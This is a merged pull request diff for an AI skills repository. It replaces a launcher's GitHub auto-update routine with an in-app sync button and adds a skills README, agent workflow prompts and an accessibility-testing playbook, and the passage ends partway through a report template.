Merge pull request #178 from zinzied/main
Add In-App Sync Skills Button & Simplify Launcher

Key changes:
- Simplified START_APP.bat: Removed unreliable auto-update logic
- Added refresh-skills-plugin.js: Vite plugin for in-app skill sync via /api/refresh-skills
- Updated vite.config.js: Registered the refresh skills plugin
- Enhanced Home.jsx: Added "Sync Skills" button with loading states and notifications

Users can now click a button in the web app to sync skills from GitHub live.

Co-authored-by: Zied Boughdir <zinzied>
Made-with: Cursor
@@ -14,101 +14,15 @@ IF %ERRORLEVEL% NEQ 0 (
exit /b 1
)

:: ===== Auto-Update Skills from GitHub =====
echo [INFO] Checking for skill updates...

:: Method 1: Try Git first (if available)
WHERE git >nul 2>nul
IF %ERRORLEVEL% EQU 0 goto :USE_GIT

:: Method 2: Try PowerShell download (fallback)
echo [INFO] Git not found. Using alternative download method...
goto :USE_POWERSHELL

:USE_GIT
:: Add upstream remote if not already set
git remote get-url upstream >nul 2>nul
IF %ERRORLEVEL% EQU 0 goto :DO_FETCH
echo [INFO] Adding upstream remote...
git remote add upstream https://github.com/sickn33/antigravity-awesome-skills.git

:DO_FETCH
echo [INFO] Fetching latest skills from original repo...
git fetch upstream >nul 2>nul
IF %ERRORLEVEL% NEQ 0 goto :FETCH_FAIL
goto :DO_MERGE

:FETCH_FAIL
echo [WARN] Could not fetch updates via Git. Trying alternative method...
goto :USE_POWERSHELL

:DO_MERGE
:: Surgically extract ONLY the /skills/ folder from upstream to avoid all merge conflicts
git checkout upstream/main -- skills >nul 2>nul
IF %ERRORLEVEL% NEQ 0 goto :MERGE_FAIL

:: Save the updated skills to local history silently
git commit -m "auto-update: sync latest skills from upstream" >nul 2>nul
echo [INFO] Skills updated successfully from original repo!
goto :SKIP_UPDATE

:MERGE_FAIL
echo [WARN] Could not update skills via Git. Trying alternative method...
goto :USE_POWERSHELL

:USE_POWERSHELL
echo [INFO] Downloading latest skills via HTTPS...
if exist "update_temp" rmdir /S /Q "update_temp" >nul 2>nul
if exist "update.zip" del "update.zip" >nul 2>nul

:: Download the latest repository as ZIP
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/sickn33/antigravity-awesome-skills/archive/refs/heads/main.zip' -OutFile 'update.zip' -UseBasicParsing" >nul 2>nul
IF %ERRORLEVEL% NEQ 0 goto :DOWNLOAD_FAIL

:: Extract and update skills
echo [INFO] Extracting latest skills...
powershell -Command "Expand-Archive -Path 'update.zip' -DestinationPath 'update_temp' -Force" >nul 2>nul
IF %ERRORLEVEL% NEQ 0 goto :EXTRACT_FAIL

:: Copy only the skills folder
if exist "update_temp\antigravity-awesome-skills-main\skills" (
    echo [INFO] Updating skills directory...
    xcopy /E /Y /I "update_temp\antigravity-awesome-skills-main\skills" "skills" >nul 2>nul
    echo [INFO] Skills updated successfully without Git!
) else (
    echo [WARN] Could not find skills folder in downloaded archive.
    goto :UPDATE_FAIL
)

:: Cleanup
del "update.zip" >nul 2>nul
rmdir /S /Q "update_temp" >nul 2>nul
goto :SKIP_UPDATE

:DOWNLOAD_FAIL
echo [WARN] Failed to download skills update (network issue or no internet).
goto :UPDATE_FAIL

:EXTRACT_FAIL
echo [WARN] Failed to extract downloaded skills archive.
goto :UPDATE_FAIL

:UPDATE_FAIL
echo [INFO] Continuing with local skills version...
echo [INFO] To manually update skills later, run: npm run update:skills

:SKIP_UPDATE

:: Check/Install dependencies
cd web-app

:CHECK_DEPS
if not exist "node_modules\" (
    echo [INFO] Dependencies not found. Installing...
    goto :INSTALL_DEPS
)

:: Verify dependencies aren't corrupted (e.g. esbuild arch mismatch after update)
echo [INFO] Verifying app dependencies...
call npx -y vite --version >nul 2>nul
if %ERRORLEVEL% NEQ 0 (
@@ -138,6 +52,7 @@ call npm run app:setup
:: Start App
echo [INFO] Starting Web App...
echo [INFO] Opening default browser...
echo [INFO] Use the Sync Skills button in the app to update skills from GitHub!
cd web-app
call npx -y vite --open
release_notes.md (new file, 14 lines)
@@ -0,0 +1,14 @@
## v6.2.0 - Interactive Web App & AWS IaC

**Feature release: Interactive Skills Web App, AWS Infrastructure as Code skills, and Chrome Extension / Cloudflare Workers developer skills.**

- **New skills** (PR #124): `cdk-patterns`, `cloudformation-best-practices`, `terraform-aws-modules`.
- **New skills** (PR #128): `chrome-extension-developer`, `cloudflare-workers-expert`.
- **Interactive Skills Web App** (PR #126): Local skills browser with `START_APP.bat`, setup, and `web-app/` project.
- **Shopify Development Skill Fix** (PR #125): Markdown syntax cleanup for `skills/shopify-development/SKILL.md`.
- **Community Sources** (PR #127): Added SSOJet skills and integration guides to Credits & Sources.
- **Registry**: Now tracking 930 skills.

---

_Upgrade: `git pull origin main` or `npx antigravity-awesome-skills`_
web-app/public/skills.json (new file, 9682 lines): file diff suppressed because it is too large.
web-app/public/skills/.gitignore (vendored, new file, 3 lines)
@@ -0,0 +1,3 @@
# Local-only: disabled skills for lean configuration
# These skills are kept in the repository but disabled locally
.disabled/
@@ -5,6 +5,7 @@ description: "Arquitecto de Soluciones Principal y Consultor Tecnológico de And
category: andruia
risk: safe
source: personal
date_added: "2026-02-27"
---

## When to Use
@@ -3,12 +3,16 @@ id: 10-andruia-skill-smith
name: 10-andruia-skill-smith
description: "Andru.ia Systems Engineer. Designs, writes, and deploys new skills within the repository following the Diamond Standard."
category: andruia
risk: official
risk: safe
source: personal
date_added: "2026-02-25"
---

# 🔨 Andru.ia Skill-Smith (The Forge)

## When to Use
This skill applies when executing the workflow or actions described in the general description.

## 📝 Description
I am the Andru.ia Systems Engineer. My purpose is to design, write, and deploy new skills within the repository, ensuring they follow the official Antigravity structure and the Diamond Standard.
@@ -38,4 +42,4 @@ Generar el código para los siguientes archivos:

## ⚠️ Golden Rules
- **Numeric Prefixes:** Assign a sequential number to each folder (e.g. 11, 12, 13) to keep things ordered.
- **Prompt Engineering:** Instructions must include "Few-shot" or "Chain of Thought" techniques for maximum precision.
@@ -5,6 +5,7 @@ description: "Estratega de Inteligencia de Dominio de Andru.ia. Analiza el nicho
category: andruia
risk: safe
source: personal
date_added: "2026-02-27"
---

## When to Use
@@ -1,8 +1,9 @@
---
name: 3d-web-experience
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing ..."
source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# 3D Web Experience
web-app/public/skills/README.md (new file, 201 lines)
@@ -0,0 +1,201 @@
# Skills Directory

**Welcome to the skills folder!** This is where all 179+ specialized AI skills live.

## 🤔 What Are Skills?

Skills are specialized instruction sets that teach AI assistants how to handle specific tasks. Think of them as expert knowledge modules that your AI can load on demand.

**Simple analogy:** Just as you might consult different experts (a designer, a security expert, a marketer), skills let your AI become an expert in different areas when you need them.

---

## 📂 Folder Structure

Each skill lives in its own folder with this structure:

```
skills/
├── skill-name/       # Individual skill folder
│   ├── SKILL.md      # Main skill definition (required)
│   ├── scripts/      # Helper scripts (optional)
│   ├── examples/     # Usage examples (optional)
│   └── resources/    # Templates & resources (optional)
```

**Key point:** Only `SKILL.md` is required. Everything else is optional!

---

## How to Use Skills

### Step 1: Make sure skills are installed
Skills should be in your `.agent/skills/` directory (or `.claude/skills/`, `.gemini/skills/`, etc.).

### Step 2: Invoke a skill in your AI chat
Use the `@` symbol followed by the skill name:

```
@brainstorming help me design a todo app
```

or

```
@stripe-integration add payment processing to my app
```

### Step 3: The AI becomes an expert
The AI loads that skill's knowledge and helps you with specialized expertise!

---

## Skill Categories

### Creative & Design
Skills for visual design, UI/UX, and artistic creation:
- `@algorithmic-art` - Create algorithmic art with p5.js
- `@canvas-design` - Design posters and artwork (PNG/PDF output)
- `@frontend-design` - Build production-grade frontend interfaces
- `@ui-ux-pro-max` - Professional UI/UX design with color, fonts, layouts
- `@web-artifacts-builder` - Build modern web apps (React, Tailwind, Shadcn/ui)
- `@theme-factory` - Generate themes for documents and presentations
- `@brand-guidelines` - Apply Anthropic brand design standards
- `@slack-gif-creator` - Create high-quality GIFs for Slack

### Development & Engineering
Skills for coding, testing, debugging, and code review:
- `@test-driven-development` - Write tests before implementation (TDD)
- `@systematic-debugging` - Debug systematically, not randomly
- `@webapp-testing` - Test web apps with Playwright
- `@receiving-code-review` - Handle code review feedback properly
- `@requesting-code-review` - Request code reviews before merging
- `@finishing-a-development-branch` - Complete dev branches (merge, PR, cleanup)
- `@subagent-driven-development` - Coordinate multiple AI agents for parallel tasks

### Documentation & Office
Skills for working with documents and office files:
- `@doc-coauthoring` - Collaborate on structured documents
- `@docx` - Create, edit, and analyze Word documents
- `@xlsx` - Work with Excel spreadsheets (formulas, charts)
- `@pptx` - Create and modify PowerPoint presentations
- `@pdf` - Handle PDFs (extract text, merge, split, fill forms)
- `@internal-comms` - Draft internal communications (reports, announcements)
- `@notebooklm` - Query Google NotebookLM notebooks

### Planning & Workflow
Skills for task planning and workflow optimization:
- `@brainstorming` - Brainstorm and design before coding
- `@writing-plans` - Write detailed implementation plans
- `@planning-with-files` - File-based planning system (Manus-style)
- `@executing-plans` - Execute plans with checkpoints and reviews
- `@using-git-worktrees` - Create isolated Git worktrees for parallel work
- `@verification-before-completion` - Verify work before claiming completion
- `@using-superpowers` - Discover and use advanced skills

### System Extension
Skills for extending AI capabilities:
- `@mcp-builder` - Build MCP (Model Context Protocol) servers
- `@skill-creator` - Create new skills or update existing ones
- `@writing-skills` - Tools for writing and validating skill files
- `@dispatching-parallel-agents` - Distribute tasks to multiple agents

---

## Finding Skills

### Method 1: Browse this folder
```bash
ls skills/
```

### Method 2: Search by keyword
```bash
ls skills/ | grep "keyword"
```

### Method 3: Check the main README
See the [main README](../README.md) for the complete list of all 179+ skills organized by category.

---

## 💡 Popular Skills to Try

**For beginners:**
- `@brainstorming` - Design before coding
- `@systematic-debugging` - Fix bugs methodically
- `@git-pushing` - Commit with good messages

**For developers:**
- `@test-driven-development` - Write tests first
- `@react-best-practices` - Modern React patterns
- `@senior-fullstack` - Full-stack development

**For security:**
- `@ethical-hacking-methodology` - Security basics
- `@burp-suite-testing` - Web app security testing

---

## Creating Your Own Skill

Want to create a new skill? Check out:
1. [CONTRIBUTING.md](../CONTRIBUTING.md) - How to contribute
2. [docs/SKILL_ANATOMY.md](../docs/SKILL_ANATOMY.md) - Skill structure guide
3. `@skill-creator` - Use this skill to create new skills!

**Basic structure:**
```markdown
---
name: my-skill-name
description: "What this skill does"
---

# Skill Title

## Overview
[What this skill does]

## When to Use
- Use when [scenario]

## Instructions
[Step-by-step guide]

## Examples
[Code examples]
```
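A quick way to sanity-check a new skill against this structure is to validate its frontmatter before submitting. A small sketch, assuming (based only on the template above) that `name` and `description` are the required fields:

```javascript
// validateSkillMd: checks that a SKILL.md string carries a frontmatter
// block with the fields the template above marks as required.
function validateSkillMd(text) {
  const m = text.match(/^---\n([\s\S]*?)\n---/);
  if (!m) return { ok: false, errors: ["missing frontmatter block"] };
  const errors = [];
  for (const field of ["name", "description"]) {
    // Look for "field:" at the start of a line inside the frontmatter.
    if (!new RegExp(`^${field}:`, "m").test(m[1])) {
      errors.push(`missing ${field}`);
    }
  }
  return { ok: errors.length === 0, errors };
}

// The basic-structure template from this README passes:
const sample = `---
name: my-skill-name
description: "What this skill does"
---

# Skill Title`;
```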

---

## Documentation

- **[Getting Started](../docs/GETTING_STARTED.md)** - Quick start guide
- **[Examples](../docs/EXAMPLES.md)** - Real-world usage examples
- **[FAQ](../docs/FAQ.md)** - Common questions
- **[Visual Guide](../docs/VISUAL_GUIDE.md)** - Diagrams and flowcharts

---

## 🌟 Contributing

Found a skill that needs improvement? Want to add a new skill?

1. Read [CONTRIBUTING.md](../CONTRIBUTING.md)
2. Study existing skills in this folder
3. Create your skill following the structure
4. Submit a Pull Request

---

## References

- [Anthropic Skills](https://github.com/anthropic/skills) - Official Anthropic skills
- [UI/UX Pro Max Skills](https://github.com/nextlevelbuilder/ui-ux-pro-max-skill) - Design skills
- [Superpowers](https://github.com/obra/superpowers) - Original superpowers collection
- [Planning with Files](https://github.com/OthmanAdi/planning-with-files) - Planning patterns
- [NotebookLM](https://github.com/PleasePrompto/notebooklm-skill) - NotebookLM integration

---

**Need help?** Check the [FAQ](../docs/FAQ.md) or open an issue on GitHub!
web-app/public/skills/SPDD/1-research.md (new file, 22 lines)
@@ -0,0 +1,22 @@
# ROLE: Codebase Research Agent
Your sole mission is to document and explain the codebase as it exists today.

## CRITICAL RULES:
- Do NOT suggest improvements, refactors, or architectural changes.
- Do NOT perform root-cause analysis or propose future improvements.
- ONLY describe what exists, where it exists, and how the components interact.
- You are a technical cartographer drawing a map of the current system.

## STEPS TO FOLLOW:
1. **Initial Analysis:** Read the files the user mentions in full (NO limit/offset).
2. **Decomposition:** Break the user's question into research areas (e.g. Routes, Database, UI).
3. **Execution:**
   - Locate where the files and components live.
   - Analyze HOW the current code works (without critiquing it).
   - Find examples of existing patterns for reference.
4. **Project State:**
   - If the project is NEW: Research and list the best folder structure and industry-standard libraries for the stack.
   - If the project is EXISTING: Identify technical debt or patterns that must be respected.

## OUTPUT:
- Generate the file `docs/prds/prd_current_task.md` with YAML frontmatter (date, topic, tags, status).
- **Mandatory Action:** End with: "Research complete. Please run `/clear` and load `.agente/2-spec.md` for planning."
web-app/public/skills/SPDD/2-spec.md (new file, 20 lines)
@@ -0,0 +1,20 @@
# ROLE: Implementation Planning Agent
You must create detailed implementation plans and be skeptical of vague requirements.

## CRITICAL RULES:
- Do not write the plan in one shot; validate the phase structure with the user.
- Every technical decision must be made before the plan is finalized.
- The plan must be actionable and complete, with no "open questions".

## STEPS TO FOLLOW:
1. **Context Check:** Read the previously generated `docs/prds/prd_current_task.md`.
2. **Phasing:** Split the work into incremental, testable phases.
3. **Detailing:** For each affected file, define:
   - **Exact path.**
   - **Action:** (CREATE | MODIFY | DELETE).
   - **Logic:** Pseudocode snippets or implementation references.
4. **Success Criteria:** Define "Automated Verification" (scripts/tests) and "Manual Verification" (UI/UX).

## OUTPUT:
- Generate the file `docs/specs/spec_current_task.md` following the phase template.
- **Mandatory Action:** End with: "Spec finalized. Please run `/clear` and load `.agente/3-implementation.md` for execution."
web-app/public/skills/SPDD/3-implementation.md (new file, 20 lines)
@@ -0,0 +1,20 @@
# ROLE: Implementation Execution Agent
You must implement an approved technical plan with surgical precision.

## CRITICAL RULES:
- Follow the intent of the plan while adapting to the reality you find.
- Implement one phase COMPLETELY before moving on to the next.
- **STOP & THINK:** If you find an error in the Spec or a mismatch in the code, STOP and report it. Do not try to guess.

## STEPS TO FOLLOW:
1. **Sanity Check:** Read the Spec and the original Ticket. Verify the environment is clean.
2. **Execution:** Code following Clean Code standards and the snippets in the Spec.
3. **Verification:**
   - After each phase, run the "Automated Verification" commands described in the Spec.
   - PAUSE for manual confirmation from the user after each completed phase.
4. **Progress:** Update the checkboxes (- [x]) in the Spec file as you go.

## OUTPUT:
- Implemented source code.
- Phase-completion report with test results.
- **Final Action:** Ask whether the user wants to run regression tests or move on to the next task.
@@ -3,6 +3,7 @@ name: ab-test-setup
description: "Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness."
risk: unknown
source: community
date_added: "2026-02-27"
---

# A/B Test Setup
@@ -3,6 +3,7 @@ name: accessibility-compliance-accessibility-audit
description: "You are an accessibility expert specializing in WCAG compliance, inclusive design, and assistive technology compatibility. Conduct audits, identify barriers, and provide remediation guidance."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Accessibility Audit and Testing
@@ -0,0 +1,502 @@
# Accessibility Audit and Testing Implementation Playbook

This file contains detailed patterns, checklists, and code samples referenced by the skill.

## Instructions

### 1. Automated Testing with axe-core

```javascript
// accessibility-test.js
const { AxePuppeteer } = require("@axe-core/puppeteer");
const puppeteer = require("puppeteer");

class AccessibilityAuditor {
  constructor(options = {}) {
    this.wcagLevel = options.wcagLevel || "AA";
    this.viewport = options.viewport || { width: 1920, height: 1080 };
  }

  async runFullAudit(url) {
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    await page.setViewport(this.viewport);
    await page.goto(url, { waitUntil: "networkidle2" });

    const results = await new AxePuppeteer(page)
      .withTags(["wcag2a", "wcag2aa", "wcag21a", "wcag21aa"])
      .exclude(".no-a11y-check")
      .analyze();

    await browser.close();

    return {
      url,
      timestamp: new Date().toISOString(),
      violations: results.violations.map((v) => ({
        id: v.id,
        impact: v.impact,
        description: v.description,
        help: v.help,
        helpUrl: v.helpUrl,
        nodes: v.nodes.map((n) => ({
          html: n.html,
          target: n.target,
          failureSummary: n.failureSummary,
        })),
      })),
      score: this.calculateScore(results),
    };
  }

  calculateScore(results) {
    const weights = { critical: 10, serious: 5, moderate: 2, minor: 1 };
    let totalWeight = 0;
    results.violations.forEach((v) => {
      totalWeight += weights[v.impact] || 0;
    });
    return Math.max(0, 100 - totalWeight);
  }
}
```

Component testing with jest-axe lives in a separate Jest test file (it uses ESM imports and JSX, unlike the CommonJS script above):

```javascript
// Component testing with jest-axe
import { render } from "@testing-library/react";
import { axe, toHaveNoViolations } from "jest-axe";

expect.extend(toHaveNoViolations);

describe("Accessibility Tests", () => {
  it("should have no violations", async () => {
    const { container } = render(<MyComponent />);
    const results = await axe(container);
    expect(results).toHaveNoViolations();
  });
});
```
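The scoring scheme in `calculateScore` can be exercised standalone, without a browser. A small sketch mirroring the same weights; the violation objects here are made up for illustration:

```javascript
// Mirrors the weighting in AccessibilityAuditor.calculateScore:
// each violation subtracts a weight by impact, floored at 0.
function scoreViolations(violations) {
  const weights = { critical: 10, serious: 5, moderate: 2, minor: 1 };
  const total = violations.reduce((sum, v) => sum + (weights[v.impact] || 0), 0);
  return Math.max(0, 100 - total);
}

// Hypothetical audit result: one critical and two moderate violations
// scores 100 - (10 + 2 + 2) = 86.
const exampleViolations = [
  { id: "image-alt", impact: "critical" },
  { id: "color-contrast", impact: "moderate" },
  { id: "label", impact: "moderate" },
];
```

This makes it easy to unit-test a score threshold (e.g. fail CI below 90) without re-running the full Puppeteer audit.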

### 2. Color Contrast Validation

```javascript
// color-contrast.js
class ColorContrastAnalyzer {
  constructor() {
    this.wcagLevels = {
      AA: { normal: 4.5, large: 3 },
      AAA: { normal: 7, large: 4.5 },
    };
  }

  async analyzePageContrast(page) {
    const elements = await page.evaluate(() => {
      return Array.from(document.querySelectorAll("*"))
        .filter((el) => el.innerText && el.innerText.trim())
        .map((el) => {
          const styles = window.getComputedStyle(el);
          return {
            text: el.innerText.trim().substring(0, 50),
            color: styles.color,
            backgroundColor: styles.backgroundColor,
            fontSize: parseFloat(styles.fontSize),
            fontWeight: styles.fontWeight,
          };
        });
    });

    return elements
      .map((el) => {
        const contrast = this.calculateContrast(el.color, el.backgroundColor);
        const isLarge = this.isLargeText(el.fontSize, el.fontWeight);
        const required = isLarge ? this.wcagLevels.AA.large : this.wcagLevels.AA.normal;

        if (contrast < required) {
          return {
            text: el.text,
            currentContrast: contrast.toFixed(2),
            requiredContrast: required,
            foreground: el.color,
            background: el.backgroundColor,
          };
        }
        return null;
      })
      .filter(Boolean);
  }

  // (added: referenced above but missing from the original snippet)
  // WCAG large text: >= 18pt (24px), or >= 14pt (~18.66px) bold.
  isLargeText(fontSize, fontWeight) {
    const bold = fontWeight === "bold" || parseInt(fontWeight, 10) >= 700;
    return fontSize >= 24 || (bold && fontSize >= 18.66);
  }

  // (added: referenced above but missing from the original snippet)
  // Parses a computed "rgb(r, g, b)" / "rgba(r, g, b, a)" string to [r, g, b].
  parseColor(color) {
    const m = color.match(/rgba?\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)/);
    return m ? [Number(m[1]), Number(m[2]), Number(m[3])] : [0, 0, 0];
  }

  calculateContrast(fg, bg) {
    const l1 = this.relativeLuminance(this.parseColor(fg));
    const l2 = this.relativeLuminance(this.parseColor(bg));
    const lighter = Math.max(l1, l2);
    const darker = Math.min(l1, l2);
    return (lighter + 0.05) / (darker + 0.05);
  }

  relativeLuminance(rgb) {
    const [r, g, b] = rgb.map((val) => {
      val = val / 255;
      return val <= 0.03928 ? val / 12.92 : Math.pow((val + 0.055) / 1.055, 2.4);
    });
    return 0.2126 * r + 0.7152 * g + 0.0722 * b;
  }
}
```

High contrast styling (CSS, kept separate from the JavaScript above):

```css
@media (prefers-contrast: high) {
  :root {
    --text-primary: #000;
    --bg-primary: #fff;
    --border-color: #000;
  }
  a { text-decoration: underline !important; }
  button, input { border: 2px solid var(--border-color) !important; }
}
```
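As a sanity check on the luminance math above: the WCAG contrast ratio for pure black on white should come out to exactly 21:1, and #767676 on white sits just past the 4.5:1 AA threshold. A standalone sketch of the same formulas as free functions:

```javascript
// Same relative-luminance and contrast-ratio formulas as
// ColorContrastAnalyzer, over [r, g, b] arrays in the 0-255 range.
function relativeLuminance([r, g, b]) {
  const [rl, gl, bl] = [r, g, b].map((v) => {
    v /= 255;
    return v <= 0.03928 ? v / 12.92 : Math.pow((v + 0.055) / 1.055, 2.4);
  });
  return 0.2126 * rl + 0.7152 * gl + 0.0722 * bl;
}

function contrastRatio(fg, bg) {
  const l1 = relativeLuminance(fg);
  const l2 = relativeLuminance(bg);
  // Lighter luminance over darker, each offset by 0.05 per WCAG.
  return (Math.max(l1, l2) + 0.05) / (Math.min(l1, l2) + 0.05);
}
```

Useful for testing a color palette in CI before any page is rendered.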

### 3. Keyboard Navigation Testing

```javascript
// keyboard-navigation.js
class KeyboardNavigationTester {
  async testKeyboardNavigation(page) {
    const results = {
      focusableElements: [],
      missingFocusIndicators: [],
      keyboardTraps: [],
    };

    // Get all focusable elements
    const focusable = await page.evaluate(() => {
      const selector =
        'a[href], button, input, select, textarea, [tabindex]:not([tabindex="-1"])';
      return Array.from(document.querySelectorAll(selector)).map((el) => ({
        tagName: el.tagName.toLowerCase(),
        text: el.innerText || el.value || el.placeholder || "",
        tabIndex: el.tabIndex,
      }));
    });

    results.focusableElements = focusable;

    // Test tab order and focus indicators
    for (let i = 0; i < focusable.length; i++) {
      await page.keyboard.press("Tab");

      const focused = await page.evaluate(() => {
        const el = document.activeElement;
        return {
          tagName: el.tagName.toLowerCase(),
          // outlineStyle is more reliable than the outline shorthand,
          // which computes to a multi-part string like "rgb(0, 0, 0) none 0px"
          hasFocusIndicator: window.getComputedStyle(el).outlineStyle !== "none",
        };
      });

      if (!focused.hasFocusIndicator) {
        results.missingFocusIndicators.push(focused);
      }
    }

    return results;
  }
}

// Enhance keyboard accessibility (runs in the page)
document.addEventListener("keydown", (e) => {
  if (e.key === "Escape") {
    const modal = document.querySelector(".modal.open");
    if (modal) closeModal(modal);
  }
});

// Make clickable divs keyboard-accessible
document.querySelectorAll("[onclick]").forEach((el) => {
  if (!["a", "button", "input"].includes(el.tagName.toLowerCase())) {
    el.setAttribute("tabindex", "0");
    el.setAttribute("role", "button");
    el.addEventListener("keydown", (e) => {
      if (e.key === "Enter" || e.key === " ") {
        el.click();
        e.preventDefault();
      }
    });
  }
});
```

### 4. Screen Reader Testing

```javascript
// screen-reader-test.js
class ScreenReaderTester {
  async testScreenReaderCompatibility(page) {
    return {
      landmarks: await this.testLandmarks(page),
      headings: await this.testHeadingStructure(page),
      images: await this.testImageAccessibility(page),
      forms: await this.testFormAccessibility(page),
    };
  }

  // (added: referenced above but missing from the original snippet)
  async testLandmarks(page) {
    return page.evaluate(() =>
      Array.from(
        document.querySelectorAll("main, nav, header, footer, aside, [role]"),
      ).map((el) => ({
        tagName: el.tagName.toLowerCase(),
        role: el.getAttribute("role"),
      })),
    );
  }

  // (added: referenced above but missing from the original snippet)
  async testImageAccessibility(page) {
    return page.evaluate(() =>
      Array.from(document.querySelectorAll("img")).map((img) => ({
        src: img.src,
        hasAlt: img.hasAttribute("alt"),
      })),
    );
  }

  async testHeadingStructure(page) {
    const headings = await page.evaluate(() => {
      return Array.from(
        document.querySelectorAll("h1, h2, h3, h4, h5, h6"),
      ).map((h) => ({
        level: parseInt(h.tagName[1]),
        text: h.textContent.trim(),
        isEmpty: !h.textContent.trim(),
      }));
    });

    const issues = [];
    let previousLevel = 0;

    headings.forEach((heading, index) => {
      if (heading.level > previousLevel + 1 && previousLevel !== 0) {
        issues.push({
          type: "skipped-level",
          message: `Heading level ${heading.level} skips from level ${previousLevel}`,
        });
      }
      if (heading.isEmpty) {
        issues.push({ type: "empty-heading", index });
      }
      previousLevel = heading.level;
    });

    if (!headings.some((h) => h.level === 1)) {
      issues.push({ type: "missing-h1", message: "Page missing h1 element" });
    }

    return { headings, issues };
  }

  async testFormAccessibility(page) {
    const forms = await page.evaluate(() => {
      return Array.from(document.querySelectorAll("form")).map((form) => {
        const inputs = form.querySelectorAll("input, textarea, select");
        return {
          fields: Array.from(inputs).map((input) => ({
            type: input.type || input.tagName.toLowerCase(),
            id: input.id,
            hasLabel: input.id
              ? !!document.querySelector(`label[for="${input.id}"]`)
              : !!input.closest("label"),
            hasAriaLabel: !!input.getAttribute("aria-label"),
            required: input.required,
          })),
        };
      });
    });

    const issues = [];
    forms.forEach((form, i) => {
      form.fields.forEach((field, j) => {
        if (!field.hasLabel && !field.hasAriaLabel) {
          issues.push({ type: "missing-label", form: i, field: j });
        }
      });
    });

    return { forms, issues };
  }
}

// ARIA patterns
const ariaPatterns = {
  modal: `
    <div role="dialog" aria-labelledby="modal-title" aria-modal="true">
      <h2 id="modal-title">Modal Title</h2>
      <button aria-label="Close">×</button>
    </div>`,

  tabs: `
    <div role="tablist" aria-label="Navigation">
      <button role="tab" aria-selected="true" aria-controls="panel-1">Tab 1</button>
    </div>
    <div role="tabpanel" id="panel-1" aria-labelledby="tab-1">Content</div>`,

  form: `
    <label for="name">Name <span aria-label="required">*</span></label>
    <input id="name" required aria-required="true" aria-describedby="name-error">
    <span id="name-error" role="alert" aria-live="polite"></span>`,
};
```

### 5. Manual Testing Checklist

```markdown
## Manual Accessibility Testing

### Keyboard Navigation

- [ ] All interactive elements accessible via Tab
- [ ] Buttons activate with Enter/Space
- [ ] Esc key closes modals
- [ ] Focus indicator always visible
- [ ] No keyboard traps
- [ ] Logical tab order

### Screen Reader

- [ ] Page title descriptive
- [ ] Headings create logical outline
- [ ] Images have alt text
- [ ] Form fields have labels
- [ ] Error messages announced
- [ ] Dynamic updates announced

### Visual

- [ ] Text resizes to 200% without loss
- [ ] Color not sole means of conveying info
- [ ] Focus indicators have sufficient contrast
- [ ] Content reflows at 320px
- [ ] Animations can be paused

### Cognitive

- [ ] Instructions clear and simple
- [ ] Error messages helpful
- [ ] No time limits on forms
- [ ] Navigation consistent
- [ ] Important actions reversible
```
|
||||
|
||||
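Parts of the keyboard-navigation checklist can be pre-screened automatically. The sketch below flags two common tab-order anti-patterns given a list of scraped element descriptors; the descriptor shape (`tag`, `tabindex`) is an assumption for illustration, not a real DOM API, so adapt it to however your audit collects elements.

```javascript
// Sketch: flag tab-order anti-patterns from a list of element descriptors.
// The { tag, tabindex } shape is assumed, not a browser API.
function findTabOrderIssues(elements) {
  const issues = [];
  elements.forEach((el, i) => {
    // A positive tabindex overrides document order and usually breaks
    // the "logical tab order" checklist item.
    if (el.tabindex > 0) {
      issues.push({ type: "positive-tabindex", index: i });
    }
    // tabindex="-1" on a natively interactive element removes it from
    // the tab sequence entirely.
    if (el.tabindex === -1 && ["a", "button", "input"].includes(el.tag)) {
      issues.push({ type: "removed-from-tab-order", index: i });
    }
  });
  return issues;
}
```

This only narrows the manual pass: focus visibility and keyboard traps still need a hands-on check.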
### 6. Remediation Examples

```javascript
// Fix missing alt text
document.querySelectorAll("img:not([alt])").forEach((img) => {
  const isDecorative =
    img.getAttribute("role") === "presentation" ||
    img.closest('[role="presentation"]');
  img.setAttribute("alt", isDecorative ? "" : img.title || "Image");
});

// Fix missing labels
document
  .querySelectorAll("input:not([aria-label]):not([id])")
  .forEach((input) => {
    if (input.placeholder) {
      input.setAttribute("aria-label", input.placeholder);
    }
  });

// React accessible components
const AccessibleButton = ({ children, onClick, ariaLabel, ...props }) => (
  <button onClick={onClick} aria-label={ariaLabel} {...props}>
    {children}
  </button>
);

const LiveRegion = ({ message, politeness = "polite" }) => (
  <div
    role="status"
    aria-live={politeness}
    aria-atomic="true"
    className="sr-only"
  >
    {message}
  </div>
);
```
### 7. CI/CD Integration

```yaml
# .github/workflows/accessibility.yml
name: Accessibility Tests

on: [push, pull_request]

jobs:
  a11y-tests:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v3

      - name: Setup Node.js
        uses: actions/setup-node@v3
        with:
          node-version: "18"

      - name: Install and build
        run: |
          npm ci
          npm run build

      - name: Start server
        run: |
          npm start &
          npx wait-on http://localhost:3000

      - name: Run axe tests
        run: npm run test:a11y

      - name: Run pa11y
        run: npx pa11y http://localhost:3000 --standard WCAG2AA --threshold 0

      - name: Upload report
        uses: actions/upload-artifact@v3
        if: always()
        with:
          name: a11y-report
          path: a11y-report.html
```
### 8. Reporting

```javascript
// report-generator.js
class AccessibilityReportGenerator {
  generateHTMLReport(auditResults) {
    return `
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Accessibility Audit</title>
  <style>
    body { font-family: Arial, sans-serif; margin: 20px; }
    .summary { background: #f0f0f0; padding: 20px; border-radius: 8px; }
    .score { font-size: 48px; font-weight: bold; }
    .violation { margin: 20px 0; padding: 15px; border: 1px solid #ddd; }
    .critical { border-color: #f00; background: #fee; }
    .serious { border-color: #fa0; background: #ffe; }
  </style>
</head>
<body>
  <h1>Accessibility Audit Report</h1>
  <p>Generated: ${new Date().toLocaleString()}</p>

  <div class="summary">
    <h2>Summary</h2>
    <div class="score">${auditResults.score}/100</div>
    <p>Total Violations: ${auditResults.violations.length}</p>
  </div>

  <h2>Violations</h2>
  ${auditResults.violations
    .map(
      (v) => `
